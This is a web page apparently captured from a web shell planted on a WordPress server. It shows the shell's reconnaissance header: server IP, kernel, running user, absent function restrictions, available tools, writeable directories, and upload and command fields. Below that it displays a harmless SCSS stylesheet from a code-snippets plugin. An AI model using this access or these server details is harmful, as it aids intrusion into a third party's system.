403Webshell
Server IP : 52.25.153.185  /  Your IP : 216.73.217.131
Web Server : Apache
System : Linux ip-172-26-6-158 5.10.0-35-cloud-amd64 #1 SMP Debian 5.10.237-1 (2025-05-19) x86_64
User : daemon ( 1)
PHP Version : 8.1.10
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : OFF  |  Sudo : ON  |  Pkexec : OFF
Directory :  /bitnami/wordpress/wp-content/plugins/code-snippets/css/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /bitnami/wordpress/wp-content/plugins/code-snippets/css//edit.scss
/**
 * Styles for the edit snippet admin page.
 */

@use 'common/direction';
@use 'common/codemirror';
@use 'common/badges';
@use 'common/switch';
@use 'common/select';
@use 'common/tooltips';
@use 'common/modal';
@use 'common/upsell';
@use 'edit/form';
@use 'edit/sidebar';
@use 'edit/editor';
@use 'edit/conditions';
@use 'edit/gpt';

.notice.error blockquote {
	margin-block-end: 0;
}

.button svg {
	block-size: 1rem;
	vertical-align: middle;
	line-height: 1;
	margin: 0;
}

.snippet-description-container {
	.wp-editor-tools {
		padding-block-start: 5px;
	}

	.wp-editor-tabs {
		float: inline-start;
	}

	.generate-button {
		float: inline-end;
		margin-block-start: 37px;
		z-index: 99;
		position: relative;
	}
}

.components-form-token-field__input-container {
	background: #fff;
	border-color: #c3c4c7;

	> .components-flex {
		padding: 12px;
	}
}

#titlediv,
.snippet-type-container {
	margin-block-end: 24px;
}

.above-snippet-code {
	margin-block: 0 15px;
	display: flex;
	align-items: center;
	margin-inline: 0;
	gap: 8px;

	h2 {
		margin: 0;
	}

	.expand-editor-button {
		display: flex;
		gap: 5px;
		align-items: center;
		margin-inline-end: auto;

		.dashicons {
			inline-size: 18px;
			block-size: 18px;
			font-size: 18px;
		}
	}
}

.snippet-name-wrapper {
	display: flex;
	gap: 0.5em;

	> :first-child {
		flex: 1;
	}
}

form.condition-snippet .snippet-code-container {
	display: none;
}

.cs-back {
	cursor: pointer;

	&::before {
		content: '<';
		color: #2271b1;
		margin-inline-end: 3px;
	}
}

Youez - 2016 - github.com/yon3zu
LinuXploit